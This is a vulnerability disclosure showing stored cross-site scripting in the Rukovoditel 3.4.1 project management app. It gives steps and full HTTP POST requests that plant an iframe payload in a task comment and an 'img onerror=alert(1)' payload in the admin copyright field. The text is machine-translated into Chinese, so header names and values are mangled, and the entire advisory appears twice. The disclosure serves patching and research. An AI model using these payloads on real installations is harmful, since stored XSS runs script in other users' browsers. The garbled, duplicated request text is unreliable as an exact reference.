利用标题: rukovoditel 3.4.1-多个存储的XSS
版本: 3.4.1
BUGS:多个存储的XSS
Technology: php
供应商URL: https://www.rukovoditel.net/
软件link: https://www.rukovoditel.net/download.php
发现的日期: 24-06-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
### XSS-1 ###
====================================================
步骤:
1。登录帐户
2。创建项目(http://localhost/index.php?模块=项目/itemspath=21)
3。添加任务
4。打开任务
5。添加评论为“ iframe src='https://14.rs'/iframe'
post/index.php?module=items/commentsaction=savetoken=feoz9Jekua http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 241
Origin: http://localhost
连接:关闭
REFERER: http://localhost/index.php?module=items/infopath=21-2/22/22-1redect_to=subentityGotopage [74]=1
cookie: cookie_test=pleper_accept_for_session; SID=VFTRL4MHMBVDBRVFMB0RB54VO5
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
form_session_token=feoz9jekuapath=21-2%2f22-1 fields%5B169%5D=47 fields%5B170%5D=53 fields%5B174%5D=3DESCRIPTION=3DESCRIPTION=%3CIFR AME+SRC%3D%22HTTPS%3A%2F%2F14.RS%22%3E%3C%2fiframe%3E+UPLOADFIVE_ATTACHMENTS_UPLOAD_ATTACHMATGENTS=comment_attachments=comment_attachments=
==================================
### XSS-2 ###
==================================
1.管理员帐户
2.进行配置=应用程序
3.版权文本设置为'img src=x OneError=alert(1)'
post/index.php?module=configuration/saveredirect_to=configuration/application http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:多部分/form-data;边界=---------------------------------- 1229838458648010343132232769
内容长度: 2766
Origin: http://localhost
连接:关闭
Referer: http://localhost/index.php?module=configuration/application
cookie: cookie_test=pleper_accept_for_session; SID=VFTRL4MHMBVDBRVFMB0RB54VO5
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='form_session_token'
JU271AAY1
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='CFG [app_name]'
Rukovoditel
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_short_name_mobile]'
FFGSDFGSDFG
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_short_name]'
鲁科
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='app_logo';文件名=''
content-type:应用程序/钟表流
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_logo]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_logo_url]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='app_favicon';文件名=''
content-type:应用程序/钟表流
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_favicon]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_copyright_name]'
img src=x OneError=alert(1)
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='CFG [app_language]'
英语
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_skin]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_timezone]'
美国/new_york
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_rows_per_page]'
10
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_date_format]'
m/d/y
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_datetime_format]'
m/d/y H:i
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_number_format]'
2/./*
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='cfg [app_first_day_of_week]'
0
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [drop_down_menu_on_hover]'
0
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [disable_check_for_updates]'
0
-------------------------------------------------------- 1229838455864801034343132232769-
版本: 3.4.1
BUGS:多个存储的XSS
Technology: php
供应商URL: https://www.rukovoditel.net/
软件link: https://www.rukovoditel.net/download.php
发现的日期: 24-06-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
### XSS-1 ###
====================================================
步骤:
1。登录帐户
2。创建项目(http://localhost/index.php?模块=项目/itemspath=21)
3。添加任务
4。打开任务
5。添加评论为“ iframe src='https://14.rs'/iframe'
post/index.php?module=items/commentsaction=savetoken=feoz9Jekua http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 241
Origin: http://localhost
连接:关闭
REFERER: http://localhost/index.php?module=items/infopath=21-2/22/22-1redect_to=subentityGotopage [74]=1
cookie: cookie_test=pleper_accept_for_session; SID=VFTRL4MHMBVDBRVFMB0RB54VO5
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
form_session_token=feoz9jekuapath=21-2%2f22-1 fields%5B169%5D=47 fields%5B170%5D=53 fields%5B174%5D=3DESCRIPTION=3DESCRIPTION=%3CIFR AME+SRC%3D%22HTTPS%3A%2F%2F14.RS%22%3E%3C%2fiframe%3E+UPLOADFIVE_ATTACHMENTS_UPLOAD_ATTACHMATGENTS=comment_attachments=comment_attachments=
==================================
### XSS-2 ###
==================================
1.管理员帐户
2.进行配置=应用程序
3.版权文本设置为'img src=x OneError=alert(1)'
post/index.php?module=configuration/saveredirect_to=configuration/application http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:多部分/form-data;边界=---------------------------------- 1229838458648010343132232769
内容长度: 2766
Origin: http://localhost
连接:关闭
Referer: http://localhost/index.php?module=configuration/application
cookie: cookie_test=pleper_accept_for_session; SID=VFTRL4MHMBVDBRVFMB0RB54VO5
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='form_session_token'
JU271AAY1
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='CFG [app_name]'
Rukovoditel
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_short_name_mobile]'
FFGSDFGSDFG
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_short_name]'
鲁科
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='app_logo';文件名=''
content-type:应用程序/钟表流
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_logo]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_logo_url]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='app_favicon';文件名=''
content-type:应用程序/钟表流
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_favicon]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_copyright_name]'
img src=x OneError=alert(1)
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='CFG [app_language]'
英语
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_skin]'
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_timezone]'
美国/new_york
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_rows_per_page]'
10
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='CFG [app_date_format]'
m/d/y
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_datetime_format]'
m/d/y H:i
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [app_number_format]'
2/./*
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data;名称='cfg [app_first_day_of_week]'
0
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [drop_down_menu_on_hover]'
0
----------------------------------------------------- 12298384558648010343132232769
content-disposition: form-data; name='cfg [disable_check_for_updates]'
0
-------------------------------------------------------- 1229838455864801034343132232769-